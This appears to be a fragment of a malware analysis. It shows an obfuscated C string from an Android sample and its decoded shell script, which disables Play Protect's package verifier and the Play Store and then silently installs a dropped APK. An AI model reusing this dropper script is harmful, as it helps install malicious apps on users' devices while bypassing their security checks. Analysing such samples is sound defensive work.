len 221
unsigned char obf_string[] = "\xc3\x26\x38\x20\x2e\x34\xf0\xc6\xf0\xfb\xea\xf2\x34\xe1\xf6\xf5\x34\xf0\xf7\xc9\xe0\xee\xfb\x2f\x2a\xf0\x2f\x05\x2f\x34\xeb\xee\xfb\xee\x34\xf3\xf4\xe0\xee\xf3\x34\xfb\xf2\xff\x34\xfb\xf2\xff\xc9\xf1\xf2\x2f\x2a\xf0\xc9\xe0\xf7\xf2\xf4\xeb\x2f\x3c\x3a\x3a\x2f\x34\xeb\xee\xfb\xee\x34\xf3\xf4\xe0\xee\xf3\x34\xfb\xf2\xff\x34\xfb\xf2\xff\xc9\xf0\xea\xfb\xfb\xf6\xf5\xec\xf0\x2f\xff\xfa\xfb\x2f\xec\xf3\xf4\xe1\xee\xf3\x2f\xff\xee\xe0\xe8\xee\xec\xea\xe4\xfd\xea\xf1\xf6\xed\xf6\xea\xf1\xe4\xea\xf5\xee\xe1\xf3\xea\x2f\x3f\xc9\xff\xf2\x2f\xeb\xf6\xf0\xee\xe1\xf3\xea\x2f\xe0\xf4\xf2\x35\xee\xf5\xeb\xf1\xf4\xf6\xeb\x35\xfd\xea\xf5\xeb\xf6\xf5\xec\xc9\xf0\xf3\xea\xea\xff\x2f\x3e\xc9\xff\xf2\x2f\xf6\xf5\xf0\xfb\xee\xf3\xf3\x2f\x34\xeb\xee\xfb\xee\x34\xf3\xf4\xe0\xee\xf3\x34\xfb\xf2\xff\x34\xfb\xf2\xff\xc9\xf1\xf2\x2f\x34\xeb\xee\xfb\xee\x34\xf3\xf4\xe0\xee\xf3\x34\xfb\xf2\xff\x34\xfb\xf2\xff\xc9Deobfuscated string: "#!/system/bin/sh
cat %s > /data/local/tmp/tmp
rm %s
chmod 755 /data/local/tmp/tmp
settings put global package_verifier_enable 0
pm disable com.android.vending
sleep 1
pm install /data/local/tmp/tmp
rm /data/local/tmp/tmp
"
